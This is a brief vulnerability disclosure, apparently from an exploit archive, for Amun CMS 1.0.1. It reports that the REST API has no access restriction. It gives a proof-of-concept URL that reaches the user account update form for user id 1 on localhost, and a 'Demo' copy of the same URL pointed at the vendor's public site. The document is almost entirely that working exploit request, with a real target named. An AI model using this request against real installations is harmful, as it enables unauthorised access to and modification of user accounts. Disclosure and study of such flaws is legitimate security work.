Amun CMS version 1.0.1 fails to restrict access to its REST API.
8a1edcbf00c3646d6fc6c484cfea43697c0602acb71980da916cbfcb6ea49926
Amun CMS 1.0.1 REST API No Access Restriction
Author : syst3m_f4ult
Homepage : http://amun-project.org
Vendor : Amun CMS
Version : 1.0.1 (probably all versions)
Tested on : Ubuntu 12.04
Date : 2013-10-11
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
Default : http://127.0.0.1/
Exploit : http://127.0.0.1/index.php/api/user/account/form?format=xml&method=update&id=1
Demo :
http://amun-project.org/index.php/api/user/account/form?format=xml&method=update&id=1